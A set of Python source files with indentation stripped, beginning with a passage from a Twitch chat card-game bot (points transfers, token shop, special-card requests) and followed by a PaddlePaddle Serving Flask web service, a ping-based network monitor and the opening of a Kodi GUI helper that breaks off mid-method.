self.message(channel, "Usage: !sendpoints <user> <amount> <reason> OR !sendpoints confirm <code>", isWhisper)
return
if args[0].lower() == "confirm":
code = args[1]
cur.execute("SELECT pt.*, users.name AS toName FROM points_transfers AS pt JOIN users ON pt.toid = users.id WHERE pt.fromid = %s ORDER BY pt.id DESC LIMIT 1", [tags['user-id']])
transfer = cur.fetchone()
if transfer is None or transfer["status"] in ["confirmed", "confirm_failed"]:
self.message(channel, "%s, you have no pending points transfer." % tags['display-name'], isWhisper)
return
if transfer["status"] == "expired":
self.message(channel, "%s, your points transfer has expired. Please try sending a new one." % tags['display-name'], isWhisper)
return
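                # The confirmation code is "<recipient>-<cost>", exactly the string the
                # sender was told to echo back when the transfer was created below.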
if "%s-%d" % (transfer["toName"], transfer["paid"]) != code:
cur.execute("UPDATE points_transfers SET status='confirm_failed' WHERE id = %s", [transfer["id"]])
self.message(channel, "%s, the confirmation code you entered was wrong. Please try sending a new points transfer." % tags['display-name'], isWhisper)
return
if not hasPoints(tags['user-id'], transfer["paid"]):
cur.execute("UPDATE points_transfers SET status='confirm_failed' WHERE id = %s", [transfer["id"]])
self.message(channel, "%s, you no longer have enough points to complete this transfer. Please try sending a new points transfer." % tags['display-name'], isWhisper)
return
addPoints(tags['user-id'], -transfer["paid"])
addPoints(transfer["toid"], transfer["sent"])
if int(transfer["sent"]) >= int(config["pointsTransferMinWhisperAmount"]):
self.message("#%s" % transfer["toName"], "%s sent you %d points with the reason: %s" % (tags["display-name"], transfer["sent"], transfer["reason"]), True)
cur.execute("UPDATE points_transfers SET status='confirmed', confirmed=%s WHERE id = %s", [current_milli_time(), transfer["id"]])
self.message(channel, "%s, you successfully paid %d points to send %d points to %s." % (tags["display-name"], transfer["paid"], transfer["sent"], transfer["toName"]))
else:
if len(args) < 3:
self.message(channel, "Usage: !sendpoints <user> <amount> <reason>", isWhisper)
return
otherparty = args[0].lower()
cur.execute("SELECT id FROM users WHERE name = %s", [otherparty])
otheridrow = cur.fetchone()
if otheridrow is None:
self.message(channel, "I don't recognize that username.", isWhisper)
return
otherid = int(otheridrow["id"])
if otherid == int(tags['user-id']):
self.message(channel, "You can't send points to yourself.", isWhisper)
return
try:
amount = int(args[1])
except ValueError:
self.message(channel, "Invalid amount of points entered.", isWhisper)
return
if amount <= 0 or amount > int(config["pointsTransferMaxAmount"]):
self.message(channel, "Invalid amount of points entered.", isWhisper)
return
reason = " ".join(args[2:])
if len(reason) < 10:
self.message(channel, "Your reason for the transfer must be at least 10 characters long.")
return
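                # Transfers cost double the amount sent: the recipient receives `amount`
                # and the other half is burned as a transfer fee.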
toPay = amount * 2
if not hasPoints(tags['user-id'], toPay):
self.message(channel, "You don't have enough points to send %d points. You need %d." % (amount, toPay), isWhisper)
return
insertArgs = [tags['user-id'], otherid, amount, toPay, current_milli_time(), reason]
cur.execute("INSERT INTO points_transfers (fromid, toid, sent, paid, status, created, reason) VALUES(%s, %s, %s, %s, 'pending', %s, %s)", insertArgs)
msgArgs = (tags["display-name"], amount, otherparty, toPay, otherparty, toPay)
self.message(channel, "%s, you want to send %d points to %s. This will cost you %d points. To confirm this action, enter !sendpoints confirm %s-%d" % msgArgs, isWhisper)
return
if command == "sorthand":
if len(args) == 0 or (args[0].lower() != "reset" and len(args) < 2):
self.message(channel, "Usage: !sorthand <comma-delimited card ids> <comma-delimited positions> OR !sorthand reset", isWhisper)
return
with db.cursor() as cur:
if args[0].lower() == "reset":
cur.execute("UPDATE cards SET sortValue = NULL WHERE userid = %s", [tags['user-id']])
self.message(channel, "Successfully reset %s's hand to default sort order." % tags['display-name'], isWhisper)
else:
if args[0].count(",") != args[1].count(","):
self.message(channel, "You must provide an equal amount of waifu/card IDs and sort values.")
return
cardSpecifiers = args[0].split(",")
sortValueStrings = args[1].split(",")
seenIDs = []
updatePairs = []
hand = getHand(tags['user-id'])
for i in range(len(cardSpecifiers)):
try:
card = parseHandCardSpecifier(hand, cardSpecifiers[i])
if card['cardid'] in seenIDs:
self.message(channel, "You entered the same card twice!", isWhisper)
return
seenIDs.append(card['cardid'])
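# Sort values must fit a signed 16-bit range (presumably a SMALLINT column in the cards table).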
sortValue = int(sortValueStrings[i])
if sortValue < -32768 or sortValue > 32767:
self.message(channel, "Invalid sort value entered. Valid values are -32768 to 32767 inclusive.", isWhisper)
return
updatePairs.append([sortValue, card['cardid']])
except CardNotInHandException:
self.message(channel, "%s, you don't own that waifu/card!" % tags['display-name'],
isWhisper)
return
except AmbiguousWaifuException:
self.message(channel,
"%s, you own more than one rarity of waifu %s! Please specify a card ID instead. You can find card IDs using !checkhand" % (
tags['display-name'], cardSpecifiers[i]), isWhisper)
return
except ValueError:
self.message(channel, "Only whole numbers/IDs please.", isWhisper)
return
cur.executemany("UPDATE cards SET sortValue = %s WHERE id = %s", updatePairs)
self.message(channel, "Updated sort values for %d cards in %s's hand." % (len(updatePairs), tags['display-name']), isWhisper)
return
if command == "autogacha" and sender in superadmins:
tokenName = config["eventTokenName"]
with db.cursor() as cur:
cur.execute("SELECT id, name, eventTokens FROM users WHERE eventTokens > 0 ORDER BY eventTokens DESC")
holders = cur.fetchall()
for holder in holders:
fullPrizes = []
userid = int(holder[0])
for i in range(int(holder[2])):
roll = tokenGachaRoll()
prizes = []
if "pack" in roll["prize"]:
giveFreeBooster(userid, roll["prize"]["pack"], roll["prize"]["amount"])
prizes.append("%dx %s pack (!freepacks open %s)" % (roll["prize"]["amount"], roll["prize"]["pack"], roll["prize"]["pack"]))
if "points" in roll["prize"]:
addPoints(userid, roll["prize"]["points"])
prizes.append("%d points" % roll["prize"]["points"])
if "pudding" in roll["prize"]:
addPudding(userid, roll["prize"]["pudding"])
prizes.append("%d pudding" % roll["prize"]["pudding"])
fullPrizes.append("[%d◆] %s" % (roll["tier"], " and ".join(prizes)))
messages = ["Your %d leftover %s(s) were fed into the Token Gacha and you got: " % (holder[2], tokenName)]
first = True
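# Chunk the prize list into several messages, starting a new one whenever a line would pass 398 characters (presumably to stay under Twitch's ~500-character message limit).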
for prizeStr in fullPrizes:
if len(messages[-1]) + len(prizeStr) > 398:
messages.append(prizeStr)
elif first:
messages[-1] += prizeStr
else:
messages[-1] += ", " + prizeStr
first = False
for message in messages:
self.message('#' + holder[1], message, True)
cur.execute("UPDATE users SET eventTokens = 0")
self.message(channel, "Done.", isWhisper)
return
if command == "tokenshop":
if not booleanConfig("annivShopOpen"):
return
promoCost = int(config["annivPromoBaseCost"])
maxPromos = int(config["annivMaxPromos"])
specialCost = int(config["annivSpecialCost"])
huCost = int(config["annivHandUpgradeCost"])
with db.cursor() as cur:
cur.execute("SELECT annivPromosBought, annivSpecialBought, annivHandUpgradeBought, eventTokens FROM users WHERE id = %s", [tags['user-id']])
purchaseData = cur.fetchone()
subcmd = "" if not len(args) else args[0].lower()
if booleanConfig("annivShopSpecialOnly") and subcmd not in ["special", "specialadmin"]:
self.message(channel, "Token Shop purchases are closed for this year, thanks for playing! If you've already purchased a Special and don't have it in your hand yet, you still have access to !tokenshop special commands.", isWhisper)
return
if subcmd == "gacha":
tokenName = config["eventTokenName"]
if len(args) == 1 or args[1].lower() != "roll":
self.message(channel, "!tokenshop gacha roll to try your luck on the %s Gacha. 1 %s per go." % (tokenName, tokenName), isWhisper)
return
# check the user's tokens
cur.execute("SELECT eventTokens FROM users WHERE id = %s", [tags['user-id']])
tokens = cur.fetchone()[0] or 0
if tokens < 1:
self.message(channel, "You don't have any %ss to roll the Gacha with." % (tokenName), isWhisper)
return
cur.execute("UPDATE users SET eventTokens = eventTokens - 1 WHERE id = %s", [tags['user-id']])
roll = tokenGachaRoll()
prizes = []
if "pack" in roll["prize"]:
giveFreeBooster(tags['user-id'], roll["prize"]["pack"], roll["prize"]["amount"])
prizes.append("%dx %s pack (!freepacks open %s)" % (roll["prize"]["amount"], roll["prize"]["pack"], roll["prize"]["pack"]))
if "points" in roll["prize"]:
addPoints(tags['user-id'], roll["prize"]["points"])
prizes.append("%d points" % roll["prize"]["points"])
if "pudding" in roll["prize"]:
addPudding(tags['user-id'], roll["prize"]["pudding"])
prizes.append("%d pudding" % roll["prize"]["pudding"])
prizeStr = " and ".join(prizes)
self.message(channel, "%s, you roll the %s Gacha and you get: [%d◆] %s" % (tags['display-name'], tokenName, roll["tier"], prizeStr), isWhisper)
return
if subcmd == "buy":
if len(args) < 2:
self.message(channel, "Usage: !tokenshop buy special | !tokenshop buy handupgrade | !tokenshop buy <promo waifu id>", isWhisper)
return
target = args[1].lower()
if target == "special":
if purchaseData[1]:
self.message(channel, "%s, you've already bought a special card! Pick another reward." % tags['display-name'], isWhisper)
return
if purchaseData[3] < specialCost:
msgArgs = (tags['display-name'], specialCost, purchaseData[3])
self.message(channel, "%s, you can't afford a special card! They cost %d tokens and you only have %d." % msgArgs, isWhisper)
return
# ok, make the purchase
cur.execute("UPDATE users SET eventTokens = eventTokens - %s, annivSpecialBought = 1 WHERE id = %s", [specialCost, tags['user-id']])
cur.execute("INSERT INTO special_requests (requesterid, state, created) VALUES(%s, 'notsent', %s)", [tags['user-id'], current_milli_time()])
self.message(channel, "%s, you bought a special card for %d tokens! You now have access to !tokenshop special which you can use to set the name/series/image of your special before submitting it for review." % (tags['display-name'], specialCost), isWhisper)
discordbody = {
"username": "WTCG Admin",
"content" : "%s just bought a Special from the token shop." % tags['display-name']
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
elif target == "handupgrade":
if purchaseData[2]:
self.message(channel, "%s, you've already bought a hand upgrade! Pick another reward." % tags['display-name'], isWhisper)
return
if purchaseData[3] < huCost:
msgArgs = (tags['display-name'], huCost, purchaseData[3])
self.message(channel, "%s, you can't afford a hand upgrade! They cost %d tokens and you only have %d." % msgArgs, isWhisper)
return
# ok, make the purchase
cur.execute("UPDATE users SET eventTokens = eventTokens - %s, annivHandUpgradeBought = 1, freeUpgrades = freeUpgrades + 1 WHERE id = %s", [huCost, tags['user-id']])
self.message(channel, "%s, you bought a hand upgrade for %d tokens! You can begin using it immediately." % (tags['display-name'], huCost), isWhisper)
else:
# promo
if purchaseData[0] >= maxPromos:
self.message(channel, "%s, you have already bought the maximum of %d promos. Pick another reward." % (tags['display-name'], maxPromos), isWhisper)
return
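# Promo pricing scales linearly: each additional promo costs promoCost more than the previous one.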
promoPrice = promoCost * (purchaseData[0] + 1)
if purchaseData[3] < promoPrice:
msgArgs = (tags['display-name'], promoPrice, purchaseData[3])
self.message(channel, "%s, you can't afford a promo! Your current cost for one is %d tokens and you only have %d." % msgArgs, isWhisper)
return
promoCard = getWaifuById(target)
if promoCard is None:
self.message(channel, "%s, you entered an invalid waifu ID." % tags['display-name'], isWhisper)
return
if not promoCard["can_purchase"]:
self.message(channel, "%s, that waifu cannot be bought. !tokenshop listpromos to get a list of buyable promos." % tags['display-name'], isWhisper)
return
addCard(tags['user-id'], promoCard['id'], 'other', None, int(config["numNormalRarities"]) + int(config["numSpecialRarities"]) - 1)
cur.execute("UPDATE users SET eventTokens = eventTokens - %s, annivPromosBought = annivPromosBought + 1 WHERE id = %s", [promoPrice, tags['user-id']])
if purchaseData[0] + 1 < maxPromos:
msgArgs = (tags['display-name'], promoCard['id'], promoCard['name'], promoPrice, purchaseData[0] + 1, promoPrice + promoCost)
self.message(channel, "%s, you bought a copy of [%d] %s for %d tokens. You have now bought %d promos so your next one will cost %d tokens." % msgArgs, isWhisper)
else:
msgArgs = (tags['display-name'], promoCard['id'], promoCard['name'], promoPrice, purchaseData[0] + 1)
self.message(channel, "%s, you bought a copy of [%d] %s for %d tokens. You have now bought %d promos so you cannot buy any more." % msgArgs, isWhisper)
elif subcmd == "listpromos":
self.message(channel, "%s, you can view the list of promos buyable with tokens here - %s" % (tags['display-name'], config["tokenPromoList"]), isWhisper)
elif subcmd == "specialadmin" and sender in superadmins:
spclcmd = "" if len(args) < 2 else args[1].lower()
if spclcmd in ["check", "accept", "reject"]:
if len(args) < 3:
self.message(channel, "Usage: !tokenshop specialadmin check/accept/reject <username>")
return
cur.execute("SELECT sr.requesterid, sr.name, sr.series, sr.image FROM special_requests sr JOIN users ON sr.requesterid=users.id WHERE users.name = %s AND sr.state = 'pending'", [args[2]])
requestInfo = cur.fetchone()
if requestInfo is None:
self.message(channel, "That user doesn't have a pending Special card request.", isWhisper)
return
if spclcmd == "check":
msgArgs = (args[2], requestInfo[1], requestInfo[2], requestInfo[3], args[2], args[2])
self.message(channel, "%s requested a Special card of %s from %s with image %s . Accept it with !tokenshop specialadmin accept %s or reject it with !tokenshop specialadmin reject %s <reason>." % msgArgs, isWhisper)
elif spclcmd == "accept":
# create waifu
try:
hostedURL = processWaifuURL(requestInfo[3])
except Exception as ex:
self.message(channel, "Could not process image. %s. Check the URL yourself and if it is invalid reject their request." % str(ex), isWhisper)
return
queryArgs = [requestInfo[1], hostedURL, int(config["numNormalRarities"]), requestInfo[2]]
cur.execute("INSERT INTO waifus (name, image, base_rarity, series) VALUES(%s, %s, %s, %s)", queryArgs)
waifuid = cur.lastrowid
addCard(requestInfo[0], waifuid, 'other')
cur.execute("UPDATE special_requests SET state = 'accepted', moderatorid = %s, updated = %s WHERE requesterid = %s", [tags['user-id'], current_milli_time(), requestInfo[0]])
self.message(channel, "Request accepted. Created Special card ID %d and gave it to %s." % (waifuid, args[2]), isWhisper)
self.message('#%s' % args[2].lower(), "Your Special card request for %s from %s was accepted." % (requestInfo[1], requestInfo[2]), True)
else:
# reject
if len(args) < 4:
self.message(channel, "Rejection reason is required.", isWhisper)
return
rejectionReason = " ".join(args[3:])
cur.execute("UPDATE special_requests SET state = 'rejected', moderatorid = %s, updated = %s, rejection_reason = %s, changed_since_rejection = 0 WHERE requesterid = %s", [tags['user-id'], current_milli_time(), rejectionReason, requestInfo[0]])
self.message('#%s' % args[2].lower(), "Your Special card request for %s from %s was rejected for the following reason: %s. Please adjust it with !tokenshop special and then resubmit." % (requestInfo[1], requestInfo[2], rejectionReason), True)
self.message(channel, "Request rejected and user notified.", isWhisper)
else:
# list pending
cur.execute("SELECT users.name FROM special_requests sr JOIN users ON sr.requesterid=users.id WHERE sr.state='pending' ORDER BY sr.updated ASC")
results = cur.fetchall()
if not results:
self.message(channel, "There are no pending Special card requests right now.", isWhisper)
else:
self.message(channel, "Special card requests have been received from: %s. Use !tokenshop specialadmin check <username> for details." % (", ".join([row[0] for row in results])), isWhisper)
elif subcmd == "special":
if not purchaseData[1]:
self.message(channel, "%s, you haven't bought a Special card with tokens yet!" % tags['display-name'], isWhisper)
return
spclcmd = "" if len(args) < 2 else args[1].lower()
cur.execute("SELECT name, series, image, state, updated, rejection_reason, changed_since_rejection FROM special_requests WHERE requesterid = %s", [tags['user-id']])
specialData = cur.fetchone()
if specialData is None:
cur.execute("INSERT INTO special_requests (requesterid, state, created) VALUES(%s, 'notsent', %s)", [tags['user-id'], current_milli_time()])
specialData = [None, None, None, 'notsent', None, None, 0]
if spclcmd in ["name", "series", "image", "submit", "confirm"] and specialData[3] not in["notsent", "rejected"]:
if specialData[3] == "pending":
self.message(channel, "%s, you have already sent in your Special card request! Please wait for a response." % tags['display-name'], isWhisper)
else:
self.message(channel, "%s, your Special card request has already been accepted!" % tags['display-name'], isWhisper)
return
if spclcmd in ["submit", "confirm"] and specialData[3] == "rejected" and not specialData[6]:
self.message(channel, "%s, you haven't changed your request at all since its rejection! Please review the rejection reason (%s) and make adjustments before resubmitting." % (tags['display-name'], specialData[5]), isWhisper)
return
if spclcmd in ["submit", "confirm"] and (specialData[0] is None or specialData[1] is None or specialData[2] is None):
self.message(channel, "%s, you haven't finished filling in the info for your Special card request yet! Please specify all 3 of name/series/image before continuing." % tags['display-name'], isWhisper)
return
if spclcmd in ["name", "series", "image"] and len(args) < 3:
self.message(channel, "Usage: !tokenshop special name <name> / series <series> / image <image URL> / submit")
return
if spclcmd == "name":
name = (" ".join(args[2:])).strip()
if not len(name) or len(name) > 50:
self.message(channel, "Please enter a waifu name of between 1 and 50 characters.", isWhisper)
return
queryArgs = [name, current_milli_time(), tags['user-id']]
cur.execute("UPDATE special_requests SET name = %s, changed_since_rejection = 1, updated = %s WHERE requesterid = %s", queryArgs)
self.message(channel, "%s -> Set the name for your Special card request to %s." % (tags['display-name'], name), isWhisper)
elif spclcmd == "series":
series = (" ".join(args[2:])).strip()
if not len(series) or len(series) > 50:
self.message(channel, "Please enter a waifu series of between 1 and 50 characters.", isWhisper)
return
queryArgs = [series, current_milli_time(), tags['user-id']]
cur.execute("UPDATE special_requests SET series = %s, changed_since_rejection = 1, updated = %s WHERE requesterid = %s", queryArgs)
self.message(channel, "%s -> Set the series for your Special card request to %s." % (tags['display-name'], series), isWhisper)
elif spclcmd == "image":
try:
validateWaifuURL(args[2])
except ValueError as ex:
self.message(channel, "Invalid image link specified. %s" % str(ex), isWhisper)
return
except Exception:
self.message(channel, "There was an unknown problem with the image link you specified. Please try again later.", isWhisper)
return
queryArgs = [args[2], current_milli_time(), tags['user-id']]
cur.execute("UPDATE special_requests SET image = %s, changed_since_rejection = 1, updated = %s WHERE requesterid = %s", queryArgs)
self.message(channel, "%s -> Set the image for your Special card request to %s" % (tags['display-name'], args[2]), isWhisper)
elif spclcmd == "submit":
self.message(channel, "%s, please confirm that you want a Special card of %s from %s with image %s by entering !tokenshop special confirm. You cannot change your submission after it is confirmed so please be careful." % (tags['display-name'], specialData[0], specialData[1], specialData[2]), isWhisper)
elif spclcmd == "confirm":
# TODO submit to admin discordhook
discordargs = (tags['display-name'], specialData[0], specialData[1], specialData[2], sender)
discordbody = {
"username": "WTCG Admin",
"content" : "%s submitted their request for a Special Card:\nName: %s\nSeries: %s\nImage: %s\nUse `!tokenshop specialadmin check %s` in any chat to check it." % discordargs
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
cur.execute("UPDATE special_requests SET state = 'pending' WHERE requesterid = %s", [tags['user-id']])
self.message(channel, "%s, your Special card request has been submitted for approval. Keep an eye on your whispers to see if it is accepted or rejected. If it is rejected you'll be able to resubmit after you fix the problems." % tags['display-name'], isWhisper)
else:
# show status
if specialData[3] == "accepted":
self.message(channel, "%s, your Special card request of %s from %s was accepted." % (tags['display-name'], specialData[0], specialData[1]), isWhisper)
elif specialData[3] == "rejected":
if specialData[6]:
self.message(channel, "%s, your previous submission was rejected for the following reason: %s. Your current submission is %s from %s with image %s . !tokenshop special name/image/series to change details or !tokenshop special submit to submit it for approval." % (tags['display-name'], specialData[5], specialData[0], specialData[1], specialData[2]), isWhisper)
else:
self.message(channel, "%s, your submission of %s from %s with image %s was rejected for the following reason: %s. Please use !tokenshop special name/image/series to change details to solve the problems and then !tokenshop special submit to resubmit it for approval." % (tags['display-name'], specialData[0], specialData[1], specialData[2], specialData[5]), isWhisper)
elif specialData[3] == "pending":
self.message(channel, "%s, your Special card request of %s from %s is still pending approval. Please wait patiently." % (tags['display-name'], specialData[0], specialData[1]), isWhisper)
else:
name = specialData[0] or "<no name yet>"
series = specialData[1] or "<no series yet>"
image = specialData[2] or "<no image yet>"
if specialData[0] and specialData[1] and specialData[2]:
self.message(channel, "%s, your current Special request is %s from %s with image %s . Use !tokenshop special name/image/series to change details or !tokenshop special submit to submit it for approval." % (tags['display-name'], name, series, image), isWhisper)
elif specialData[0] or specialData[1] or specialData[2]:
self.message(channel, "%s, your current Special request is %s from %s with image %s . Use !tokenshop special name/image/series to add the missing details and then !tokenshop special submit to submit it for approval." % (tags['display-name'], name, series, image), isWhisper)
else:
self.message(channel, "%s, you haven't started on your Special request yet. Use !tokenshop special name/image/series to add the required details and then !tokenshop special submit to submit it for approval." % tags['display-name'], isWhisper)
else:
# list items
purchasable = []
if purchaseData[0] < maxPromos:
promoPrice = promoCost * (purchaseData[0] + 1)
purchasable.append("Promo card - current cost %d tokens (%d already bought, %d max) - !tokenshop buy <waifu id> (!tokenshop listpromos for a list)" % (promoPrice, purchaseData[0], maxPromos))
if not purchaseData[1]:
purchasable.append("Special card - cost %d tokens - !tokenshop buy special" % specialCost)
if not purchaseData[2]:
purchasable.append("Hand upgrade - cost %d tokens - !tokenshop buy handupgrade" % huCost)
purchasable.append("Gacha roll - costs 1 token - !tokenshop gacha roll")
self.message(channel, "%s, you have %d Anniversary Tokens. Items currently available to you: %s" % (tags['display-name'], purchaseData[3], " / ".join(purchasable)), isWhisper)
return
class MarathonBot(pydle.Client):
instance = None
pw = None
def __init__(self):
super().__init__(config["marathonChannel"][1:])
MarathonBot.instance = self
self.ffz = MarathonFFZWebsocket(config["marathonChannel"][1:])
def start(self, password):
pool.connect(self, "irc.twitch.tv", 6667, tls=False, password=password)
self.pw = password
logger.info("Connecting MarathonBot...")
def on_disconnect(self, expected):
logger.warning("MarathonBot Disconnected, reconnecting....")
pool.connect(self, "irc.twitch.tv", 6667, tls=False, password=self.pw, reconnect=True)
def on_connect(self):
super().on_connect()
logger.info("MarathonBot Joining")
def on_message(self, source, target, message):
logger.debug("message on MarathonBot: %s, %s, %s", str(source), str(target), message)
def updateFollowButtons(self, channels):
if self.ffz is None:
self.ffz = MarathonFFZWebsocket(config["marathonChannel"][1:], channels)
else:
self.ffz.updateFollowButtons(channels)
def message(self, *args):
logger.info("MarathonBot Sending "+str(args))
super().message(*args)
class MarathonFFZWebsocket:
def __init__(self, channelName, newFollowButtons=None):
self.channelName = channelName
self.messageNumber = 0
self.queuedChanges = []
self.initDone = False
if newFollowButtons is not None:
self.queuedChanges.append(newFollowButtons)
self.ws = websocket.WebSocketApp(ffzws, on_message=self.on_message, on_error=self.on_error, on_close=self.on_close)
self.ws.on_open = self.on_open
thread.start_new_thread(self.ws.run_forever, (), {"origin": ""})
def sendMessage(self, message):
self.messageNumber += 1
self.ws.send("%d %s" % (self.messageNumber, message))
def on_open(self):
self.sendMessage('hello ["waifutcg-ffzclient",false]')
def on_message(self, message):
logger.debug("Websocket recv: "+message)
code, msg = message.split(" ", 1)
code = int(code)
if code == -1:
# probably authorize
if msg.startswith("do_authorize"):
# must send auth code
authCode = json.loads(msg[13:])
logger.debug("trying to authenticate with FFZ "+authCode)
MarathonBot.instance.message("#frankerfacezauthorizer", "AUTH "+authCode)
elif code == self.messageNumber and self.messageNumber < 5 and msg.split(" ")[0] == "ok":
# send the rest of the intro
if self.messageNumber == 1:
self.sendMessage('setuser %s' % json.dumps(self.channelName))
elif self.messageNumber == 2:
self.sendMessage('sub %s' % json.dumps('room.'+self.channelName))
elif self.messageNumber == 3:
self.sendMessage('sub %s' % json.dumps('channel.'+self.channelName))
else:
self.sendMessage('ready 0')
elif code >= 5 and self.messageNumber >= 5 and len(self.queuedChanges) > 0:
self.initDone = True
self.updateFollowButtons(self.queuedChanges[0])
self.queuedChanges = self.queuedChanges[1:]
elif code >= 5 and self.messageNumber >= 5 and msg.split(" ")[0] == "ok":
self.initDone = True
else:
# don't do anything immediately
pass
def on_error(self, error):
logger.debug("WS Error: "+error)
self.ws.close()
def on_close(self):
logger.debug("Websocket closed")
MarathonBot.instance.ffz = None
def updateFollowButtons(self, channels):
if not self.initDone:
self.queuedChanges.append(channels)
else:
self.sendMessage("update_follow_buttons %s" % json.dumps([self.channelName, channels]))
curg = db.cursor()
logger.info("Fetching channel list...")
curg.execute("SELECT name FROM channels")
channels = []
for row in curg.fetchall():
channels.append("#" + row[0])
logger.debug("Channels: %s", str(channels))
curg.close()
loadConfig()
# twitch api init
checkAndRenewAppAccessToken()
# get user data for the bot itself
headers = {"Authorization": "Bearer %s" % config["appAccessToken"], "Client-ID": config["clientID"]}
r = requests.get("https://api.twitch.tv/helix/users", headers=headers,
params={"login": str(config["username"]).lower()})
j = r.json()
try:
twitchid = j["data"][0]["id"]
except Exception:
twitchid = 0
config["twitchid"] = str(twitchid)
b = NepBot(config, channels)
b.start(config["oauth"])
# marathon bot?
if booleanConfig("marathonBotFunctions"):
maraBot = MarathonBot()
maraBot.start(config["marathonOAuth"])
logger.debug("past start")
pool.handle_forever()
|
web_service.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!flask/bin/python
# pylint: disable=doc-string-missing
from flask import Flask, request, abort
from multiprocessing import Pool, Process
from paddle_serving_server import OpMaker, OpSeqMaker, Server
from paddle_serving_client import Client
class WebService(object):
def __init__(self, name="default_service"):
self.name = name
def load_model_config(self, model_config):
self.model_config = model_config
def _launch_rpc_service(self):
op_maker = OpMaker()
read_op = op_maker.create('general_reader')
general_infer_op = op_maker.create('general_infer')
general_response_op = op_maker.create('general_response')
op_seq_maker = OpSeqMaker()
op_seq_maker.add_op(read_op)
op_seq_maker.add_op(general_infer_op)
op_seq_maker.add_op(general_response_op)
server = Server()
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(16)
server.load_model_config(self.model_config)
server.prepare_server(
workdir=self.workdir, port=self.port + 1, device=self.device)
server.run_server()
def prepare_server(self, workdir="", port=9393, device="cpu"):
self.workdir = workdir
self.port = port
self.device = device
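# Note: the Flask front end serves on 'port', while the backing RPC server (above) binds 'port + 1'.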
def _launch_web_service(self):
app_instance = Flask(__name__)
client_service = Client()
client_service.load_client_config(
"{}/serving_server_conf.prototxt".format(self.model_config))
client_service.connect(["0.0.0.0:{}".format(self.port + 1)])
service_name = "/" + self.name + "/prediction"
@app_instance.route(service_name, methods=['POST'])
def get_prediction():
if not request.json:
abort(400)
if "fetch" not in request.json:
abort(400)
feed, fetch = self.preprocess(request.json, request.json["fetch"])
if "fetch" in feed:
del feed["fetch"]
fetch_map = client_service.predict(feed=feed, fetch=fetch)
fetch_map = self.postprocess(
feed=request.json, fetch=fetch, fetch_map=fetch_map)
return fetch_map
app_instance.run(host="0.0.0.0",
port=self.port,
threaded=False,
processes=1)
def run_server(self):
import socket
localIP = socket.gethostbyname(socket.gethostname())
print("web service address:")
print("http://{}:{}/{}/prediction".format(localIP, self.port,
self.name))
p_rpc = Process(target=self._launch_rpc_service)
p_web = Process(target=self._launch_web_service)
p_rpc.start()
p_web.start()
p_web.join()
p_rpc.join()
def preprocess(self, feed={}, fetch=[]):
return feed, fetch
def postprocess(self, feed={}, fetch=[], fetch_map={}):
return fetch_map
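# A minimal usage sketch (the model directory name is hypothetical; preprocess
# and postprocess are the intended override points):
#
# service = WebService(name="uci")
# service.load_model_config("uci_housing_model")
# service.prepare_server(workdir="workdir", port=9393, device="cpu")
# service.run_server()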
|
ping.py | import logging
import subprocess
from subprocess import run, check_output, CalledProcessError, TimeoutExpired
from threading import Thread, Lock
import time
import utils.pingparse as pingparse
LOGGER = logging.getLogger(__name__)
def setup_sensor(config):
return PingMonitor(config['name'], config['host'], config['interval'], config['prefix'])
class PingMonitor:
def __init__(self, name, destination, interval=10, prefix=''):
self.name = name
self.type = 'output'
self.destination = destination
self.interval = interval
self.prefix = prefix
self.errors = 0
self.loss = 0
self.latency = []
self.total = 0
self.lock = Lock()
self.running = True
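# Sleep in one-second slices so stop() can interrupt a long interval promptly.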
def _sleep(self, amount):
while amount > 0:
if not self.running:
break
if amount > 1:
time.sleep(1)
amount -= 1
else:
time.sleep(amount)
amount = 0
def _run(self):
while self.running:
# Run a ping
start = time.time()
try:
result = run('ping -c 1 -w 5 {}'.format(self.destination),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
timeout=10)
with self.lock:
self._parse(result)
except TimeoutExpired:
LOGGER.error("Ping command timed out")
except Exception:
LOGGER.exception("Exception occurred while pinging")
end = time.time()
sleep_time = self.interval - (end - start)
if sleep_time > 0:
# LOGGER.debug("Sleeping for %s", sleep_time)
self._sleep(sleep_time)
else:
LOGGER.warning("Sleep time is negative (%s). Ignoring...",
sleep_time)
def _parse(self, result):
if result.returncode == 0:
result = pingparse.parse(result.stdout.decode('utf8'))
self.latency.append(float(result['avgping']))
if int(result['packet_loss']) != 0:
self.loss += 1
else:
LOGGER.warning("Ping error: %s", result.stderr.decode('utf8'))
self.errors += 1
self.total += 1
def start(self):
self.sensor_thread = Thread(target=self._run)
self.sensor_thread.start()
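# read() reports the counters accumulated since the previous call and then resets them, so each sample is a per-interval delta.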
def read(self):
with self.lock:
latency = sum(self.latency) / len(self.latency) if len(self.latency) > 0 else 0
data = {self.prefix + 'ping_errors': self.errors,
self.prefix + 'ping_latency': latency,
self.prefix + 'ping_packet_loss': self.loss,
self.prefix + 'ping_total': self.total}
self.errors = 0
self.loss = 0
self.latency = []
self.total = 0
return data
def stop(self):
self.running = False
self.sensor_thread.join()
|
kodigui.py | # -*- coding: utf-8 -*-
import xbmc
import xbmcgui
import time
import threading
import traceback
MONITOR = None
class BaseFunctions:
xmlFile = ''
path = ''
theme = ''
res = '720p'
width = 1280
height = 720
usesGenerate = False
def __init__(self):
self.isOpen = True
def onWindowFocus(self):
# Not automatically called. Can be used by an external window manager
pass
def onClosed(self):
pass
@classmethod
def open(cls, **kwargs):
window = cls(cls.xmlFile, cls.path, cls.theme, cls.res, **kwargs)
window.modal()
return window
@classmethod
def create(cls, show=True, **kwargs):
window = cls(cls.xmlFile, cls.path, cls.theme, cls.res, **kwargs)
if show:
window.show()
window.isOpen = True
return window
def modal(self):
self.isOpen = True
self.doModal()
self.onClosed()
self.isOpen = False
def activate(self):
if not self._winID:
self._winID = xbmcgui.getCurrentWindowId()
xbmc.executebuiltin('ReplaceWindow({0})'.format(self._winID))
def mouseXTrans(self, val):
return int((val / self.getWidth()) * self.width)
def mouseYTrans(self, val):
return int((val / self.getHeight()) * self.height)
def closing(self):
